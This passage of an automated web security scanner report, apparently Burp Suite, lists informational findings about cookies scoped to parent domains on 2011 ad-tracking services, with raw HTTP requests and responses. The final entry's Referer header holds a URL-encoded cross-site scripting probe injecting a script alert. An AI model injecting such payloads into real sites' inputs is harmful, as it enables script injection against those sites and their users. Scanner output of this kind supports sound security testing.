Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Content-Length: 0
Server: Chango RTB Server
Location: http://bh.contextweb.com/bh/rtset?do=add&ev=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4&pid=535495&rurl=http%3A//d.chango.com/m/s/contextweb&x=2011-06-29
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref="http://as.chango.com/static/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html; charset=UTF-8
Set-Cookie: _t=9ed3f2f2-7f5a-11e0-a07a-00259009a9e4; Domain=chango.com; expires=Thu, 13 May 2021 01:20:00 GMT; Path=/
Set-Cookie: _i_cw=1; Domain=chango.com; expires=Thu, 30 Jun 2011 01:20:00 GMT; Path=/
Connection: close

15.22. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/dm/mkt/44/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=3133143063234146036; Domain=.audienceiq.com; Expires=Sat, 12-Nov-2011 01:20:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/4325897289836481830 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=3746342843808454987&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

15.23. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/dm/mkt/73/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=7367907040977902081; Domain=.audienceiq.com; Expires=Sat, 12-Nov-2011 01:20:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/73/mpid//mpuid/4325897289836481830 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=3746342843808454987&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

15.24. http://d.audienceiq.com/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.audienceiq.com
Path:	/r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=3598886902647137246; Domain=.audienceiq.com; Expires=Sat, 12-Nov-2011 01:20:12 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L2NzaWQvNS9leHRwaWQvNA/extuid/0 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=3746342843808454987&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

15.25. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.mediabrandsww.com
Path:	/r/dm/mkt/3/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=2614175914018475511; Domain=.mediabrandsww.com; Expires=Sat, 12-Nov-2011 01:20:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/3/mpid//mpuid/4325897289836481830 HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=3746342843808454987&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

15.26. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.p-td.com
Path:	/r/dm/mkt/4/mpid//mpuid/4325897289836481830

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=8496530639253255806; Domain=.p-td.com; Expires=Sat, 12-Nov-2011 01:20:26 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/4325897289836481830 HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=3415619682339308882&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8496530639253255806

Response

15.27. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/9/url/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.p-td.com
Path:	/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/9/url/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=8496530639253255806; Domain=.p-td.com; Expires=Sat, 12-Nov-2011 01:20:08 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/9/url/ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://www.telegraph.co.uk/sponsored/travel/disney/8509938/Disney-Cruise-Line-A-world-of-entertainment.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

15.28. http://d.turn.com/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.turn.com
Path:	/r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:20:13 GMT; Path=/
uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:20:13 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/dd/id/L2NzaWQvMS9jaWQvMzMxMDg2My90LzI/cat/,/id/L2NzaWQvMS9jaWQvMzMxMTIxNy90LzI/cat/000 HTTP/1.1
Host: d.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=3746342843808454987&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pf=UzQBb_qiX6nr0FKOSBMrL4loZQajlZS6rkFepl0bgHZzsYisygncD_G3QSholkobwYgDN2QBUCNB-f2MyAu5Iq-zuOwmX-HrTHP_QKh0DDi99zZmaeAXB5JqUWuVeu3CdB8okOrIsD5nHq-_Oy6eE6ZJ2sUtm5dhlmrTisFEH-Qb_3kXOMU75B8jogKvtULEAuR9LhkZd1Pd-Bo72tCNnWkHYZEnMGWwdeg40WMiAMgzcOT8yL0M8Y7JHcobYaY7CrcYIpvJPvJ4qVS8lVf1VA4PrJv2xfxYYZ31k7BT2Jc; uid=4325897289836481830; rrs=1002%7C2%7C3%7C4%7Cundefined%7C6%7C7%7Cundefined%7C9%7C1001%7Cundefined%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008; rds=15110%7C15110%7C15110%7C15110%7Cundefined%7C15110%7C15110%7Cundefined%7C15110%7C15110%7Cundefined%7C15110%7C15110%7C15110%7Cundefined%7C15110%7Cundefined%7Cundefined%7C15110; rv=1

Response

15.29. http://data.adsrvr.org/map/cookie/contextweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://data.adsrvr.org
Path:	/map/cookie/contextweb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

TDID=d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609; domain=.adsrvr.org; expires=Wed, 16-May-2012 01:26:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /map/cookie/contextweb HTTP/1.1
Host: data.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/4462/5032/7102-2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TDID=d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609; X-Mapping-fjhppofk=56D14B6C0CC14A5761E9A7895E1F89AF

Response

HTTP/1.1 302 Found
Cache-Control: private,no-cache, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Location: http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: TDID=d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609; domain=.adsrvr.org; expires=Wed, 16-May-2012 01:26:11 GMT; path=/
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Date: Mon, 16 May 2011 01:26:10 GMT
Content-Length: 213

Redirecting to: <a href="http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609">http://bh.contextweb.com/bh/rtset?do=add&pid=534301&ev=d7aeb157-aa7f-4dc8-ba2f-15a
...[SNIP]...

15.30. http://disneycruise.disney.go.com/reservations/customize previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://disneycruise.disney.go.com
Path:	/reservations/customize

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

dcl_i_persistence=H+s53hrJN6y2Ah9b0W5d6AFb7O28f0XOK5Gdp5dw9D2ir0p8lxkPl7qrvYGY/z/9JOA=;expires=Mon, 16-May-2011 04:29:16 GMT;path=/;domain=disney.go.com;

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

15.31. http://f.nexac.com/e/a-677/s-2140.xgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://f.nexac.com
Path:	/e/a-677/s-2140.xgi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

na_id=2011051519270862126421219180; expires=Wed, 15-May-2013 01:33:20 GMT; path=/; domain=.nexac.com
na_lr=20110515; expires=Tue, 17-May-2011 07:33:20 GMT; path=/; domain=.nexac.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /e/a-677/s-2140.xgi?na_random=516841224&na_url=http%3A//www.fingerhut.com/user/start_credit_app.jsp%3F%26CTid%3D471%26CTKey%3Dcrd10%26CTMedia%3Dx1%26CTProgType%3Dmplus1%26CTUnitSize%3D728x90%26CTTestGrp%3Dstatic%26cm_mmc%3Dx1-_-mplus1-_-728x90-_-static&na_referrer=http%3A//ad.doubleclick.net/adi/x1.rtb/fingerhut/doubledma/ron/ctest%3Bsz%3D728x90%3Bclick%3Dhttp%3A//bn.xp1.ru4.com/bclick%3F_f%3D8BWls1L7DgGK%26_o%3D15607%26_eo%3D747980%26_et%3D1305508796%26_a%3D1791737%26_s%3D0%26_d%3D1125798%26_pm%3D747980%26_pn%3D17918465%26redirect%3D%3Bu%3D17918465%3Bord%3D6394684%3F&na_title=Fingerhut%3A%20Credit%20Application&na_bksite=22&na_imsite=&na_iitaxid=&na_iicatid=&na_trncnv=mRn8Y3pPWrpy_yEEPuI6T0lqo5HPo1UDDYo9y1AT4qny6bqfWdNaY8CyzUjUE-oCYu1g8PP9mqMSB6Edtps_4g&na_trntrg=&na_trncrt=&na_ev=N&na_ct=0&na_kw= HTTP/1.1
Host: f.nexac.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/user/start_credit_app.jsp?&CTid=471&CTKey=crd10&CTMedia=x1&CTProgType=mplus1&CTUnitSize=728x90&CTTestGrp=static&cm_mmc=x1-_-mplus1-_-728x90-_-static
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
Set-Cookie: na_id=2011051519270862126421219180; expires=Wed, 15-May-2013 01:33:20 GMT; path=/; domain=.nexac.com
Set-Cookie: na_lr=20110515; expires=Tue, 17-May-2011 07:33:20 GMT; path=/; domain=.nexac.com
Set-Cookie: na_ps=3; expires=Wed, 15-May-2013 01:33:20 GMT; path=/; domain=.nexac.com
X-Powered-By: Jigawatts
Content-type: text/html
Date: Mon, 16 May 2011 01:33:20 GMT
Server: lighttpd/1.4.18
Content-Length: 382

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Expires" content="-1">
</head>
<body>

<iframe name="__bknsframe" src="http://tags.bluekai.com/psite/1846?partner=1&ret=h
...[SNIP]...

15.32. http://https.edge.ru4.com/smartserve/ad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://https.edge.ru4.com
Path:	/smartserve/ad

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ru4.1320=1#2656#0#2656=ad-2656-004|3|1305509917569%7C2656%7Cpt-2656-001%7Cpl-2656-104%7Cad-2656-004%7C%2B-%7Coff%7C%2B-%7Ccontrol%7C%2B-%7Cnone%7Ccontrol%7C2915161843%7Cpt-2656-001%2526%25255E%25255E%25255E%2526homepage%2526%2526%2526%25255E%25255E%25255E%2526%25255E%2526%2526173.193.214.243%2526%2526%2526%2526%2526%2526|%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-|1305509917#; Domain=.edge.ru4.com; Expires=Fri, 15-Jul-2011 01:38:37 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /smartserve/ad?placement=pt-2656-001&invocation=0&forcejs&ssv_TRT12=&ssv_TRT11=&ssv_TRT8=&ssv_TRT3=&ssv_TRT1=Homepage&ssv_TRT2=&ssv_TRT9=&ssv_TRT7=&ssv_TRT10=&ssv_TRT13=&ssv_TRT4=&ssv_TRT5=&ssv_TRT6=&click= HTTP/1.1
Host: https.edge.ru4.com
Proxy-Connection: keep-alive
Referer: http://www.fingerhut.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X1ID=AG-00000001389358554; 1780853-B1781017=3|1781033|0|0|0|1781015|1781012|-1; C1780853=0@4; 66281-B66290=3|0|0|0|0|66286|110253|-1; 90514-B90519=0|0|0|0|0|66286|110253|-1; M62795-747980=1; ru4.uid=2|3|0#54973178325826274#1086656007; ru4.1320=1#2656#0#2656=ad-2656-009|1|1305509448043%7C2656%7Cpt-2656-001%7Cpl-2656-094%7Cad-2656-009%7C%2B-%7Coff%7C%2B-%7Ccontrol%7C%2B-%7Cnone%7Ccontrol%7C2915161843%7Cpt-2656-001%25264%25255E%25255E4%25255E%2526category%2526%2526%2526%25255E%25255E%25255E%2526%25255E%2526%2526173.193.214.243%2526%2526%2526%2526%2526%2526|%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-|1305509448#

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://https.edge.ru4.com/w3c/p3p.xml", CP="NON DSP COR TAIa PSAa PSDa OUR SAMa IND UNI PUR COM NAV DEM STA"
Pragma: No-Cache
Cache-Control: private, no-cache="Set-Cookie"
Set-Cookie: ru4.1320=1#2656#0#2656=ad-2656-004|3|1305509917569%7C2656%7Cpt-2656-001%7Cpl-2656-104%7Cad-2656-004%7C%2B-%7Coff%7C%2B-%7Ccontrol%7C%2B-%7Cnone%7Ccontrol%7C2915161843%7Cpt-2656-001%2526%25255E%25255E%25255E%2526homepage%2526%2526%2526%25255E%25255E%25255E%2526%25255E%2526%2526173.193.214.243%2526%2526%2526%2526%2526%2526|%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%2B-%7C%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-%2526%252B-|1305509917#; Domain=.edge.ru4.com; Expires=Fri, 15-Jul-2011 01:38:37 GMT; Path=/
Content-Type: text/html
Date: Mon, 16 May 2011 01:38:37 GMT
Connection: close

document.write("<img src=\"http://ad.yieldmanager.com/pixel?id=126805&t=2\" width=\"1\" height=\"1\" /><img src=\"http://ad.doubleclick.net/activity;src=1889824;dcnet=4856;boom=11880;sz=1x1;ord=123456
...[SNIP]...

15.33. http://i.w55c.net/ping_match.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://i.w55c.net
Path:	/ping_match.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

wfivefivec=ea5c094a-3a81-4d54-b8e2-975f65fd39a9;Path=/;Domain=.w55c.net;Expires=Wed, 15-May-13 01:19:51 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping_match.gif?ei=PUBMATIC&rurl=http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw&piggybackCookie=uid:_wfivefivec_ HTTP/1.1
Host: i.w55c.net
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: wfivefivec=ea5c094a-3a81-4d54-b8e2-975f65fd39a9

Response

HTTP/1.1 302 Found
Set-Cookie: wfivefivec=ea5c094a-3a81-4d54-b8e2-975f65fd39a9;Path=/;Domain=.w55c.net;Expires=Wed, 15-May-13 01:19:51 GMT
X-Version: DataXu Pixel Tracker v3
Cache-Control: private
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTU3MSZ0bD0xNTc2ODAw
Server: Jetty(6.1.22)
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 0

15.34. http://ib.adnxs.com/getuid previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:26:02 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuid?http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&rnd=3746342843808454987&fpid=12&nu=n&t=&sp=n&purl=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]1]%)u#^pig7$W[c#Nv?q+O.JPTaAJ6dMys4SK'wFPAQFp.dMq!LfS)mzXh]:[^WX?#; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:26:02 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:26:02 GMT; domain=.adnxs.com; HttpOnly
Location: http://r.turn.com/r/bd?ddc=1&pid=54&cver=1&uid=3420415245200633085
Date: Mon, 16 May 2011 01:26:02 GMT
Content-Length: 0

15.35. http://ib.adnxs.com/getuidnb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/getuidnb

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:19:51 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getuidnb?http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9NzkmdGw9MTQ0MCZkcF9pZD01Nw==&vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9NzgmdGw9MTU3NjgwMCZkcF9pZD01Nw==&piggybackCookie=uid:$UID HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]1]%)u#^pig7$W[c#Nv?q+O.JPTaAJ6dMys4SK'wFPAQFp.dMq!LfS)mzXh]:[^WX?#; sess=1; uuid2=3420415245200633085

Response

HTTP/1.1 302 Moved
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:19:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Sun, 14-Aug-2011 01:19:51 GMT; domain=.adnxs.com; HttpOnly
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0xJnR5cGU9MSZqcz0xJmNvZGU9NzkmdGw9MTQ0MCZkcF9pZD01Nw==&vcode=bz0yJnR5cGU9MSZqcz0xJmNvZGU9NzgmdGw9MTU3NjgwMCZkcF9pZD01Nw==&piggybackCookie=uid:3420415245200633085
Date: Mon, 16 May 2011 01:19:51 GMT
Content-Length: 0

15.36. http://ib.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=2724386019227846218; path=/; expires=Sat, 13-Aug-2011 21:34:00 GMT; domain=.adnxs.com; HttpOnly
uuid2=2724386019227846218; path=/; expires=Sat, 13-Aug-2011 21:34:00 GMT; domain=.adnxs.com; HttpOnly
anj=Kfu=8fG7]PE:3F.0s]#%2L_'x%SEV/i#+eB!z6Uxbd$ekQ..D!3bbvAPDd9f*e9c*LWg-SshA`8$?a)y4E[awEZ=NRYH]uD*p*C0hV*uPX.hu:m6o?K5dWXQaKLvNc6uvJdkNRXx+G.Jdz8+ER>jd8trh0`4?o7aUl=7Z8ICIG-f)t.Jw?R[d%g5%'ml+e6b+@>>1HNgmU?N$>FG=uNIH(Eh#F0AnT^%9LRKtHe[qOwdIiju; path=/; expires=Sat, 13-Aug-2011 21:34:00 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add_code=impx-11262&member=30 HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://pastebin.com/favicon.ico50732%22%3E%3Cscript%3Ealert(/DORK/)%3C/script%3Ed0c46a64a0
